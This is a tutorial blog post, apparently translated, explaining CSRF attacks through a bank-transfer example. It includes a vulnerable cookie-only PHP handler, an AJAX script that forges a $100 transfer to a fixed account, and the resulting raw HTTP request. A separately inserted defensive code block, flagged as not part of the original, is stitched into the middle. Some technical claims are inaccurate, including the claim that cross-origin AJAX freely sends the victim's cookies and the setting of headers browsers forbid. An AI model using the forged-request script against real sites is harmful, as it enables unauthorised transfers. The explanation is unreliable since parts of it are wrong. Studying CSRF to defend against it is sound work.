With a CSRF attack we can send a forged request from the user's browser, and thus act on the site with the user's permissions, interacting with it as though the script were the user himself.
A good example of CSRF is a bank site: after the user logs in, the site creates cookies on his computer (the role of the cookies is to save the session data).
From this moment on, any action made from the user's browser is approved by the site's system. Here AJAX comes in: with AJAX we can send a request (an HTTP request) from the browser itself.
This means all of the user's cookies and session data are sent with the request (unlike a request made from a server-side language). So suppose there is a form on the bank site used for money transfers.
We can send a POST request to that form using AJAX and the request is approved by the site's system, because all the cookies of the user's browser are sent with the AJAX request.
Example of a CSRF exploit
HTML:
Code:
<form action="" method="post" name="transfer">
Amount of money to transfer:
<label>
<input type="text" name="money" id="money"/> $
</label>
<br/>
For bank account:
<label>
<input type="text" name="Baccount" id="Baccount"/>
</label>
<p>
<label>
<input type="submit" name="send" id="send" value="Submit"/>
</label>
</p>
</form>
PHP:
Code:
<?php
if (isset($_POST['send']))
{
    // the only "authentication" is the presence of the user's cookies
    if (is_numeric($_COOKIE['id']) && isset($_COOKIE['Password']))
    {
        if (...)
        {
            // if the cookies are valid
            // transfer
        }
        else
        {
            // if the cookies are invalid
            // block
        }
    }
}
?>
What's the risk here? As you can see, the PHP script only checks whether the cookies are valid and, without any additional check, approves the transfer.
This means that if we have the cookies, we only need to send a forged request to the system with the user's cookies and the system approves the transfer.
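The handler above trusts cookies alone. As an added example that is not part of the original post, here is the same transfer handler protected with a per-session CSRF token (the synchronizer token pattern); the file name transfer.php and the function names are assumptions.

```php
<?php
// Added example (not from the original post): the transfer handler protected
// with a synchronizer token. The file name transfer.php is assumed.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true]);
session_start();

// Called when rendering the transfer form: one random token per session,
// stored server-side and embedded in the form as a hidden field. A forged
// request from another origin cannot read this value, so it cannot include it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '"/>';
}

// Called on POST: compare in constant time, reject on any mismatch.
function csrf_check(array $post): bool
{
    if (empty($_SESSION['csrf_token']) || empty($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['send'])) {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // Only now perform the existing cookie/session validation and the transfer.
}
?>
<form action="transfer.php" method="post" name="transfer">
<?php echo csrf_field(); ?>
Amount of money to transfer: <input type="text" name="money"/> $
For bank account: <input type="text" name="Baccount"/>
<input type="submit" name="send" value="Submit"/>
</form>
```

The token check rejects a forged request whether it comes from an XMLHttpRequest or from an auto-submitted HTML form on another site, because neither can read the victim's session token. The SameSite attribute on the session cookie is a second, independent layer, not a replacement for the token.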
AJAX:
Code:
<script type="text/javascript">
var http = GetXmlHttpObject();
if (http != null)
{
    var url = ""; // address of the form being attacked
    var pack = "money=100&Baccount=0123456789&send=Submit";
    http.open("POST", url, true);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-length", pack.length);
    http.setRequestHeader("Connection", "close");
    http.send(pack);
}
function GetXmlHttpObject()
{
    if (window.XMLHttpRequest)
    {
        return new XMLHttpRequest();
    }
    if (window.ActiveXObject)
    {
        return new ActiveXObject("Microsoft.XMLHTTP");
    }
    return null;
}
</script>
As already explained, AJAX requests are sent from the browser itself, so we do not have to worry about obtaining the user's cookies.
So even though we only sent the POST body, the request that reaches the server will look something like this:
Code:
POST /file.php HTTP/1.1\r\n
Host: www.2cto.com\r\n
Cookie: id=...; password=...;\r\n
Connection: Close\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: ...\r\n
\r\n
money=100&Baccount=0123456789&send=Submit
Once the server returns 200 (request received successfully), $100 has been transferred from the user's account to account number 0123456789.
And that is how the CSRF attack works. Goodbye...
From http://hi.baidu.com/evilrapper/blog/item/9bc74f36ede15c2e0a55a91e.html